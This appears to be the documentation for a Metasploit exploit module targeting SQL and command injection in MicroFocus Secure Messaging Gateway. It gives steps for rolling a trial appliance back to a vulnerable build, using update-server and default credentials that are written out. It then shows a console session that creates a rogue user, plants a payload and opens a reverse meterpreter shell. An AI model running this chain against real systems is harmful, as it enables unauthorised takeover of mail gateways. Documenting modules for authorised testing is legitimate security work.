## Vulnerable Application

This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging
Gateway. An unauthenticated user can execute a terminal command under the context of the web user.

One of the user supplied parameters of API endpoint is used by the application without input validation
and/or parameter binding, which leads to SQL injection vulnerability. Successfully exploiting this
vulnerability gives a ability to add new user onto system. manage_domains_dkim_keygen_request.php
endpoint is responsible for executing an operation system command. It's not possible to access this
endpoint without having a valid session.

Combining these vulnerabilities gives the opportunity execute operation system commands under the
context of the web user.
        
### Installation Steps

Complete the following trial submission form. You will be able to [download the product as a OVA or ISO file](https://www.microfocus.com/products/secure-gateway/trial/).
Installation instructions can be [found here](https://www.microfocus.com/documentation/secure-messaging-gateway/GWAVA%207.0/secure-gateway.pdf).

Please note that newer trial appliances by default are no longer vulnerable to the attacks used by
this module, but for testing purposes there is a way to make it vulnerable again.

First, go ahead and install the ISO. The appliance is based on Debian (for example, version 7 is
running a modified version of Ubuntu 16.04), so installation should be very similar to that.

After you log into the system as "gwava:gwava" (which is the default credential), you should see
this on your screen:

```
####################################

Please run the following command:

sudo /opt/gwavapreinstall.sh

####################################
```

The gwavapreinstall.sh script is what you need to modify. To do this, open it with your favorite text
editor with sudo like this:

```
$ sudo nano -w /opt/gwavapreinstall.sh
```

The bash script uses svn to download the latest software from the official site, but we can go back to
a specific commit to test the vulnerability again. Go ahead and find this line in the file:

```
sudo svn co --username gwavaupdate --password gwavam8 --non-interactive https://gwava7updates.gwava.com/update/gwava7/release $GWAVA_DIR
```

And modify to (the difference is the ```release@444```):

```
sudo svn co --username gwavaupdate --password gwavam8 --non-interactive https://gwava7updates.gwava.com/update/gwava7/release@444 $GWAVA_DIR
```

Make sure you save it, and then now run the script:

```
$ sudo /opt/gwavapreinstall.sh
```

After running the script, make sure to browse to https://[IP] to complete the installation. And then
after that, you are ready to test the module.

Note that the module may not work at the very first try, but the second time should work.

## Verification Steps

A successful check of the exploit will look like this:

1. Start `msfconsole`
2. `use exploit/linux/http/microfocus_secure_messaging_gateway `
3. Set `RHOST`
4. Set `LHOST`
5. Run `check`
6. **Verify** that you are seeing `The target is vulnerable`
7. Run `exploit`
8. **Verify** that you are seeing `Creating an user with appropriate privileges` in console.
9. **Verify** that you are seeing `User successfully created. Username : rmcynlbredxqh` in console.
10. **Verify** that you are seeing `Authenticating with created user` in console.
11. **Verify** that you are seeing `Successfully authenticated` in console.
12. **Verify** that you are seeing `Creating a domain with a malformed DKIM data` in console.
13. **Verify** that you are seeing `Payload is successfully implanted` in console.
14. **Verify** that you are seeing `Triggering an implanted payload` in console.
15. **Verify** that you are getting meterpreter session.

## Scenarios

```
msf5 > use exploit/linux/http/microfocus_secure_messaging_gateway 
msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > set RHOSTS 12.0.0.25
RHOSTS => 12.0.0.25
msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > run

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Creating an user with appropriate privileges
[+] User successfully created. Username : rmcynlbredxqh
[*] Authenticating with created user
[+] Successfully authenticated
[*] Creating a domain record with a malformed DKIM data
[+] Payload is successfully implanted
[*] Triggering an implanted payload
[*] Sending stage (37775 bytes) to 12.0.0.25
[*] Meterpreter session 10 opened (12.0.0.1:4444 -> 12.0.0.25:44332) at 2018-06-25 20:26:54 +0100
[*] Cleaning up...

meterpreter > pwd
/opt/gwava/gwavaman/http/admin/contents/ou
meterpreter >
```
